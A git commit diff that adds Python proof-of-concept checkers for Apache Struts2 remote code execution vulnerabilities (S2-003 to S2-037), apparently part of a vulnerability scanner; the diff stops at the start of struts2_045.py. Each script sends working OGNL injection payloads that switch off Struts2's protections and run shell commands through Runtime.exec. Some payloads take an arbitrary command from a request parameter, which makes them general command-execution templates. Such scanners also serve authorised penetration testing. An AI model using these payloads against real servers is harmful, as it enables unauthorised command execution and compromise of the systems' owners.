Add files via upload

2020-01-03 10:51:47 +08:00
parent fd5562a527
commit 4c3b0a2632
34 changed files with 1862 additions and 0 deletions
--- a/saucerframe/scripts/CVE-2019-2725-POC.txt
+++ b/saucerframe/scripts/CVE-2019-2725-POC.txt
--- a/saucerframe/scripts/struts2_003.py
+++ b/saucerframe/scripts/struts2_003.py
@@ -0,0 +1,38 @@
 import warnings
 import requests
 import random
 warnings.filterwarnings("ignore")
 def poc(url, **kwargs):
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    timeout = 10
    proxies = {'http': '127.0.0.1:9999'}
    ran_a = random.randint(10000000, 20000000)
    ran_b = random.randint(1000000, 2000000)
    ran_check = ran_a - ran_b
    check = [ran_check, '无法初始化设备 PRN', '??????? PRN', 'Unable to initialize device PRN']
    lin = 'expr' + ' ' + str(ran_a) + ' - ' + str(ran_b)
    poc_goop = [
        r"(%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003dfalse%27)(bla)(bla)&(%27\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\u0023mycmd\u003d\%27print goop\%27%27)(bla)(bla)&(%27\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\u0023mycmd)%27)(bla)(bla)&(A)((%27\u0023mydat\u003dnew\40java.io.DataInputStream(\u0023myret.getInputStream())%27)(bla))&(B)((%27\u0023myres\u003dnew\40byte[51020]%27)(bla))&(C)((%27\u0023mydat.readFully(\u0023myres)%27)(bla))&(D)((%27\u0023mystr\u003dnew\40java.lang.String(\u0023myres)%27)(bla))&(%27\u0023myout\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\u0023myout.getWriter().println(\u0023mystr)%27)(bla))",
        r"(%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003dfalse%27)(bla)(bla)&(%27\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\u0023mycmd\u003d\%27" + lin + r"\%27%27)(bla)(bla)&(%27\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\u0023mycmd)%27)(bla)(bla)&(A)((%27\u0023mydat\u003dnew\40java.io.DataInputStream(\u0023myret.getInputStream())%27)(bla))&(B)((%27\u0023myres\u003dnew\40byte[51020]%27)(bla))&(C)((%27\u0023mydat.readFully(\u0023myres)%27)(bla))&(D)((%27\u0023mystr\u003dnew\40java.lang.String(\u0023myres)%27)(bla))&(%27\u0023myout\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\u0023myout.getWriter().println(\u0023mystr)%27)(bla))"
    ]
    headers = {
        "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        for test in poc_goop:
            # req = requests.post(url, headers=headers, data=test, timeout=timeout, verify=False, proxies=proxies)
            req = requests.post(url, headers=headers, data=test, timeout=timeout, verify=False, )
            result = "目标存在 Struts2-003, check url: %s" % url
            for c in check:
                if str(c) in req.text:
                    return result
    except:
        pass
--- a/saucerframe/scripts/struts2_005.py
+++ b/saucerframe/scripts/struts2_005.py
@@ -0,0 +1,46 @@
 import warnings
 import requests
 import random
 import http.client as httplib
 warnings.filterwarnings("ignore")
 httplib.HTTPConnection._http_vsn = 10
 httplib.HTTPConnection._http_vsn_str = 'HTTP/1.0'
 def poc(url, **kwargs):
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    timeout = 10
    proxies = {'http': '127.0.0.1:9999'}
    ran_a = random.randint(10000000, 20000000)
    ran_b = random.randint(1000000, 2000000)
    ran_check = ran_a - ran_b
    check = [ran_check, '无法初始化设备 PRN', '??????? PRN', 'Struts2-vuln-Goop', 'Unable to initialize device PRN']
    lin = 'expr' + ' ' + str(ran_a) + ' - ' + str(ran_b)
    poc_goop = [
        r"('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'print goop\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))",
        r"('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'" + lin + r"\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))",
        r'''('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))=&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))=&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))=&(i95)(('\43xman.getWriter().print("Struts2-")')(d))=&&(i96)(('\43xman.getWriter().print("vuln-Goop")')(d))=&(i99)(('\43xman.getWriter().close()')(d))='''
        ]
    headers = {
        "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        for test in poc_goop:
            req = requests.post(url, headers=headers, data=test, timeout=timeout,)
            result = "目标存在 Struts2-005, check url: %s" % url
            for c in check:
                if str(c) in req.text:
                    return result
    except:
        pass
 if __name__ == '__main__':
    a = poc("http://192.168.106.130:8080/example/HelloWorld.action")
    print(a)
--- a/saucerframe/scripts/struts2_008.py
+++ b/saucerframe/scripts/struts2_008.py
@@ -0,0 +1,37 @@
 import warnings
 import requests
 import random
 warnings.filterwarnings("ignore")
 def poc(url, **kwargs):
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    timeout = 10
    proxies = {'http': '127.0.0.1:9999'}
    ran_a = random.randint(10000000, 20000000)
    ran_b = random.randint(1000000, 2000000)
    ran_check = ran_a - ran_b
    check = [ran_check, '无法初始化设备 PRN', '??????? PRN','Unable to initialize device PRN']
    lin = 'expr' + ' ' + str(ran_a) + ' - ' + str(ran_b)
    poc_goop = [
        r"?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27print goop%27%29.getInputStream%28%29%29)",
        r"?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27" + lin + r"%27%29.getInputStream%28%29%29)",
    ]
    headers = {
        "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        for test in poc_goop:
            req = requests.get(url + test, headers=headers, timeout=timeout, verify=False,)
            result = "目标存在 Struts2-008, check url: %s" % url
            for c in check:
                if str(c) in req.text:
                    return result
    except:
        pass
--- a/saucerframe/scripts/struts2_009.py
+++ b/saucerframe/scripts/struts2_009.py
@@ -0,0 +1,48 @@
 import warnings
 import requests
 import random
 # import http.client as httplib
 #
 # warnings.filterwarnings("ignore")
 #
 # httplib.HTTPConnection._http_vsn = 10
 # httplib.HTTPConnection._http_vsn_str = 'HTTP/1.0'
 def poc(url, **kwargs):
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    timeout = 10
    proxies = {'http': '127.0.0.1:9999'}
    ran_a = random.randint(10000000, 20000000)
    ran_b = random.randint(1000000, 2000000)
    ran_check = ran_a - ran_b
    check = [ran_check, '无法初始化设备 PRN', '??????? PRN', 'Struts2-vuln-Goop',
             'Unable to initialize device PRN']
    lin = 'expr' + ' ' + str(ran_a) + ' - ' + str(ran_b)
    poc_goop = [
        r'class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27print goop%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]',
        r'class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27' + lin + '%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]',
        r'''class.classLoader.jarPath=%28%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23outstr%3d@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2c%23outstr.print%28%22Struts2-%22%29%2c%23outstr.println%28%22vuln-Goop%22%29%2c%23outstr.close%28%29%29%28meh%29&z%5b%28class.classLoader.jarPath%29%28%27meh%27%29%5d='''
    ]
    headers = {
        "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        for test in poc_goop:
            req = requests.post(url, data=test, headers=headers, timeout=timeout, verify=False)
            # print(req.text)
            result = "目标存在 Struts2-009, check url: %s" % url
            for c in check:
                if str(c) in req.text:
                    return result
    except:
        pass
 if __name__ == '__main__':
    a = poc("http://192.168.106.130:8080/ajax/example5.action")
    print(a)
--- a/saucerframe/scripts/struts2_013.py
+++ b/saucerframe/scripts/struts2_013.py
@@ -0,0 +1,43 @@
 import warnings
 import requests
 import random
 warnings.filterwarnings("ignore")
 def poc(url, **kwargs):
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    timeout = 10
    proxies = {'http': '127.0.0.1:9999'}
    ran_a = random.randint(10000000, 20000000)
    ran_b = random.randint(1000000, 2000000)
    ran_check = ran_a - ran_b
    check = [ran_check, '无法初始化设备 PRN', '??????? PRN', 'Struts2-vuln-Goop1116',
             'Unable to initialize device PRN']
    lin = 'expr' + ' ' + str(ran_a) + ' - ' + str(ran_b)
    poc_goop = [
        r'''a=1${(%23_memberAccess["allowStaticMethodAccess"]=true,%23a=@java.lang.Runtime@getRuntime().exec('print goop').getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[50000],%23c.read(%23d),%23sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23sbtest.println(%23d),%23sbtest.close())}''',
        r'''a=1${(%23_memberAccess["allowStaticMethodAccess"]=true,%23a=@java.lang.Runtime@getRuntime().exec("''' + lin + '''").getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[50000],%23c.read(%23d),%23sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23sbtest.println(%23d),%23sbtest.close())}''',
        r'a=1${(%23_memberAccess["allowStaticMethodAccess"]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23k8out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23k8out.print(%23req.getRealPath("Struts2-vuln-Goop")),%23k8out.println(1116),%23k8out.close())}'
    ]
    headers = {
        "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        for test in poc_goop:
            req = requests.post(url, data=test, headers=headers, timeout=timeout, verify=False, )
            result = "目标存在 Struts2-013, check url: %s" % url
            for c in check:
                if str(c) in req.text:
                    return result
    except:
        pass
 if __name__ == '__main__':
    a = poc("http://192.168.106.130:8080/link.action")
    print(a)
--- a/saucerframe/scripts/struts2_015.py
+++ b/saucerframe/scripts/struts2_015.py
@@ -0,0 +1,38 @@
 import warnings
 import requests
 import random
 warnings.filterwarnings("ignore")
 def poc(url, **kwargs):
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    timeout = 10
    proxies = {'http': '127.0.0.1:9999'}
    ran_a = random.randint(10000000, 20000000)
    ran_b = random.randint(1000000, 2000000)
    ran_check = ran_a - ran_b
    check = [ran_check, '无法初始化设备 PRN', '??????? PRN', 'Unable to initialize device PRN']
    lin = 'expr' + ' ' + str(ran_a) + ' - ' + str(ran_b)
    poc_goop = [
        r"/%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('print goop').getInputStream())%2C%23q%7D.action",
        r"/%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('" + lin + "').getInputStream())%2C%23q%7D.action"
    ]
    headers = {
        "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        for test in poc_goop:
            req = requests.get(url + test, headers=headers, timeout=timeout, verify=False, )
            result = "目标存在 Struts2-015, check url: %s" % url
            for c in check:
                if str(c) in req.text:
                    return result
    except:
        pass
--- a/saucerframe/scripts/struts2_016.py
+++ b/saucerframe/scripts/struts2_016.py
@@ -0,0 +1,42 @@
 import warnings
 import requests
 warnings.filterwarnings("ignore")
 def poc(url, **kwargs):
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    timeout = 10
    proxies = {'http': '127.0.0.1:9999'}
    check = ['\Struts2-vlun-Goop', '/Struts2-vlun-Goop', '-Struts2-vlun-Goop',
             'Unable to initialize device PRN']
    poc_goop = [
        r"redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22Struts2-vlun-Goop%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().print(%23b),%23matt.getWriter().print(1116),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D",
        r"redirect%3a%24%7b%23resp%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2c%23resp.getWriter%28%29.print%28%27-Struts2-vuln%27%2b%27-Goop%27%29%2c%23resp.getWriter%28%29.flush%28%29%2c%23resp.getWriter%28%29.close%28%29%7d"
        # r"redirect:http://www.gooip.club/"
    ]
    headers = {
        "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        for test in poc_goop:
            req_get = requests.get(url + '?' + test, headers=headers, timeout=timeout, verify=False,
                                   allow_redirects=False)
            req_post = requests.post(url, data=test, headers=headers, timeout=timeout, verify=False,
                                     allow_redirects=False,)
            req_list = [req_get.text, req_post.text, req_get.headers, req_post.headers]
            result = "目标存在 Struts2-016, check url: %s" % url
            for c in check:
                for text in req_list:
                    if str(c) in text:
                        return result
    except:
        pass
 if __name__ == '__main__':
    a = poc("http://192.168.106.130:8080/index.action")
    print(a)
--- a/saucerframe/scripts/struts2_019.py
+++ b/saucerframe/scripts/struts2_019.py
@@ -0,0 +1,38 @@
 import warnings
 import requests
 warnings.filterwarnings("ignore")
 def poc(url, **kwargs):
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    timeout = 10
    proxies = {'http': '127.0.0.1:9999'}
    check = ['Struts2-vuln-Goop1116', '-Struts2-vuln-Goop', 'Unable to initialize device PRN']
    poc_goop = [
        r'''debug=command&expression=#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#a=#req.getSession(),#b=#a.getServletContext(),#c=#b.getRealPath("Struts2-vuln-Goop"),#matt=%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')%2C#matt.getWriter().print(#c),#matt.getWriter().print(1116),#matt.getWriter().flush(),#matt.getWriter().close()''',
        r'''debug=command&expression=%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2c%23f.setAccessible%28true%29%2c%23f.set%28%23_memberAccess%2ctrue%29%2c%23resp%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2c%23resp.getWriter%28%29.println%28%27-Struts2-vuln%27%2b%27-Goop%27%29%2c%23resp.getWriter%28%29.flush%28%29%2c%23resp.getWriter%28%29.close%28%29'''
    ]
    headers = {
        "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        for test in poc_goop:
            req = requests.post(url, data=test, headers=headers, timeout=timeout, verify=False, )
            result = "目标存在 Struts2-019, check url: %s" % url
            for c in check:
                if str(c) in req.text:
                    return result
    except:
        pass
 if __name__ == '__main__':
    a = poc("http://192.168.106.130:8080/ajax/example5.action")
    print(a)
--- a/saucerframe/scripts/struts2_032.py
+++ b/saucerframe/scripts/struts2_032.py
@@ -0,0 +1,46 @@
 import warnings
 import requests
 import random
 warnings.filterwarnings("ignore")
 def poc(url, **kwargs):
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    timeout = 10
    proxies = {'http': '127.0.0.1:9999'}
    ran_a = random.randint(10000000, 20000000)
    ran_b = random.randint(1000000, 2000000)
    ran_check = ran_a - ran_b
    lin = 'expr' + ' ' + str(ran_a) + ' - ' + str(ran_b)
    check = [ran_check, '无法初始化设备 PRN', '??????? PRN', 'Struts2-vuln-Goop1116',
             'Unable to initialize device PRN']
    poc_goop = [
        r"method%3a%23_memberAccess%3d@ognl.OgnlContext+@DEFAULT_MEMBER_ACCESS%2c%23kxlzx%3d+@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%28" + str(
            ran_a) + '-' + str(ran_b) + "%29%2c%23kxlzx.close",
        r"method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=print+goop&pp=\\A&ppp=%20&encoding=UTF-8",
        r"method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=" + lin + r"&pp=\\A&ppp=%20&encoding=UTF-8",
        r"method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),%23w.print(1116),1?%23xx:%23request.toString&pp=Struts2-vuln-Goop&encoding=UTF-8"]
    headers = {
        "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        for test in poc_goop:
            req = requests.post(url, data=test, headers=headers, timeout=timeout, verify=False)
            result = "目标存在 Struts2-032, check url: %s" % url
            for c in check:
                if str(c) in req.text:
                    # print(str(c))
                    return result
    except:
        pass
 # test_url = 'http://127.0.0.1:8080/struts2-showcase/jsf/index.action'
 if __name__ == '__main__':
    a = poc("http://192.168.106.130:8032/memoshow.action?id=4")
    print(a)
--- a/saucerframe/scripts/struts2_033.py
+++ b/saucerframe/scripts/struts2_033.py
@@ -0,0 +1,41 @@
 import warnings
 import requests
 import random
 warnings.filterwarnings("ignore")
 def poc(url, **kwargs):
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    timeout = 10
    proxies = {'http': '127.0.0.1:9999'}
    ran_a = random.randint(10000000, 20000000)
    ran_b = random.randint(1000000, 2000000)
    ran_check = ran_a - ran_b
    lin = 'expr' + ' ' + str(ran_a) + ' - ' + str(ran_b)
    check = [ran_check, '无法初始化设备 PRN', '??????? PRN', 'Unable to initialize device PRN']
    poc_goop = [
        r"/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=print goop",
        r"/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=" + lin + ""
    ]
    headers = {
        "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        for test in poc_goop:
            req = requests.get(url + test, headers=headers, timeout=timeout, verify=False, )
            result = "目标存在 Struts2-033, check url: %s" % url
            for c in check:
                if str(c) in req.text:
                    # print(str(c))
                    return result
    except:
        pass
 # test_url =
--- a/saucerframe/scripts/struts2_037.py
+++ b/saucerframe/scripts/struts2_037.py
@@ -0,0 +1,41 @@
 import warnings
 import requests
 import random
 warnings.filterwarnings("ignore")
 def poc(url, **kwargs):
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    timeout = 10
    proxies = {'http': '127.0.0.1:9999'}
    ran_a = random.randint(10000000, 20000000)
    ran_b = random.randint(1000000, 2000000)
    ran_check = ran_a - ran_b
    lin = 'expr' + ' ' + str(ran_a) + ' - ' + str(ran_b)
    check = [ran_check, '无法初始化设备 PRN', '??????? PRN', 'Struts2-vuln-GoopStruts2-vuln-Goop',
             'Unable to initialize device PRN']
    poc_goop = [
        r"/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=7556&command=print goop",
        r"/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=7556&command=" + lin + ""
        r"/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.print(%23parameters.content%5B0%5D),%23wr.print(%23parameters.content%5B0%5D),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=Struts2-vuln-Goop"]
    headers = {
        "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        for test in poc_goop:
            req = requests.get(url + test, headers=headers, timeout=timeout, verify=False, )
            result = "目标存在 Struts2-037, check url: %s" % url
            for c in check:
                if str(c) in req.text:
                    # print(str(c))
                    return result
    except:
        pass
 # test_url =
--- a/saucerframe/scripts/struts2_045.py
+++ b/saucerframe/scripts/struts2_045.py
@@ -0,0 +1,42 @@
 import warnings
 import requests
